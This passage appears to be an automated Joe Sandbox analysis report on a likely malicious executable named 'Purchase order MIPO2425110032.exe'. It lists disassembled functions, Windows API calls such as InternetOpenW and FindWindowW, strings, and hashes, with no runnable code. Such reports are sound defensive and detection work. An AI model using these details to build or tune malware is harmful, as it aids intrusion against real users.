                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: GlobalMemorySleepStatus
                                                            • String ID: @
                                                            • API String ID: 2783356886-2766056989
                                                            • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                            • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                                                            • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                            • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                                                            Function 00465225 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: htonsinet_addr
                                                            • String ID: 255.255.255.255
                                                            • API String ID: 3832099526-2422070025
                                                            • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                            • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                                                            • Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                            • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                                                            Function 0044256C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: InternetOpen
                                                            • String ID: <local>
                                                            • API String ID: 2038078732-4266983199
                                                            • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                            • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                                                            • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                            • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                                            Function 004321A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: __fread_nolock_memmove
                                                            • String ID: EA06
                                                            • API String ID: 1988441806-3962188686
                                                            • Opcode ID: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                            • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                                                            • Opcode Fuzzy Hash: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                            • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                                                            Function 00442BB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID: u,D
                                                            • API String ID: 4104443479-3858472334
                                                            • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                            • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                                                            • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                            • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                                                            Function 004560F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                            • wsprintfW.USER32 ref: 0045612A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: MessageSend_mallocwsprintf
                                                            • String ID: %d/%02d/%02d
                                                            • API String ID: 1262938277-328681919
                                                            • Opcode ID: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                            • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                                                            • Opcode Fuzzy Hash: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                            • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                                                            Function 00442651 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InternetCloseHandle.WININET(?), ref: 00442663
                                                            • InternetCloseHandle.WININET ref: 00442668
                                                              • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: CloseHandleInternet$ObjectSingleWait
                                                            • String ID: aeB
                                                            • API String ID: 857135153-906807131
                                                            • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                            • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                                                            • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                            • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                                                            Function 00433244 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            • C:\Users\user\Desktop\Purchase order MIPO2425110032.exe, xrefs: 0043324B
                                                            • ^B, xrefs: 00433248
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _wcsncpy
                                                            • String ID: ^B$C:\Users\user\Desktop\Purchase order MIPO2425110032.exe
                                                            • API String ID: 1735881322-1603518458
                                                            • Opcode ID: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                                                            • Instruction ID: 95fca152a805ab331260cabc3645652019b64b11bc5d0d7a1f408bc65d2df1f2
                                                            • Opcode Fuzzy Hash: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                                                            • Instruction Fuzzy Hash: ADE0C23360051A7B9710DE4AD841DBBF37DEEC4A20B08802AF90883200E2B1BD1A43E4
                                                            Function 00441BE8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                                                            • PostMessageW.USER32(00000000), ref: 00441C05
                                                              • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: FindMessagePostSleepWindow
                                                            • String ID: Shell_TrayWnd
                                                            • API String ID: 529655941-2988720461
                                                            • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                            • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                                                            • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                            • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                                                            Function 00441C20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                                                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                                              • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: FindMessagePostSleepWindow
                                                            • String ID: Shell_TrayWnd
                                                            • API String ID: 529655941-2988720461
                                                            • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                            • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                                                            • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                            • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                                                            Function 004370C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                                              • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Message_doexit
                                                            • String ID: AutoIt$Error allocating memory.
                                                            • API String ID: 1993061046-4017498283
                                                            • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                            • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                                                            • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                            • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D